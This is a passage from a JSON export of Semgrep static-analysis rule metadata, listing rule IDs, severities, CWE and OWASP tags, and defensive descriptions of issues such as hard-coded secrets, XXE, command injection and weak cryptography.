CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC721 onERC721Received() reentrancy"},"help":{"markdown":"ERC721 onERC721Received() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy)\n - [https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a](https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a)\n - [https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef](https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef)\n","text":"ERC721 onERC721Received() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy","id":"solidity.security.erc721-reentrancy.erc721-reentrancy","name":"solidity.security.erc721-reentrancy.erc721-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc721-reentrancy.erc721-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"help":{"markdown":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host)\n - [https://nginx.org/en/docs/http/ngx_http_map_module.html](https://nginx.org/en/docs/http/ngx_http_map_module.html)\n","text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","id":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","name":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","properties":{"precision":"very-high","tags":["CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"help":{"markdown":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","id":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","name":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5","id":"kotlin.lang.security.use-of-md5.use-of-md5","name":"kotlin.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","id":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","name":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","id":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","name":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","id":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","name":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher","id":"kotlin.lang.security.no-null-cipher.no-null-cipher","name":"kotlin.lang.security.no-null-cipher.no-null-cipher","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.no-null-cipher.no-null-cipher"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"help":{"markdown":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","id":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","name":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"help":{"markdown":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","id":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","name":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input)\n - [https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html](https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","id":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","name":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"help":{"markdown":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv)\n - [https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options)\n","text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","id":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","name":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","properties":{"precision":"very-high","tags":["CWE-1204: Generation of Weak Initialization Vector (IV)","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm-express.vm-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm-express.vm-express","id":"javascript.express.code.vm-express.vm-express","name":"javascript.express.code.vm-express.vm-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm-express.vm-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"help":{"markdown":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation)\n - [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","id":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","name":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"help":{"markdown":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","id":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","name":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-regex-dos.check-regex-dos"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"help":{"markdown":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random","id":"java.lang.security.audit.crypto.weak-random.weak-random","name":"java.lang.security.audit.crypto.weak-random.weak-random","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-random.weak-random"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"help":{"markdown":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp)\n - [https://docs.python.org/3/library/tempfile.html#tempfile.mktemp](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"helpUri":"https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp","id":"python.lang.file.avoid-mktemp.avoid-mktemp","name":"python.lang.file.avoid-mktemp.avoid-mktemp","properties":{"precision":"very-high","tags":["CWE-377: Insecure Temporary File","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.avoid-mktemp.avoid-mktemp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request)\n - [https://golang.org/pkg/net/http/#Get](https://golang.org/pkg/net/http/#Get)\n","text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// 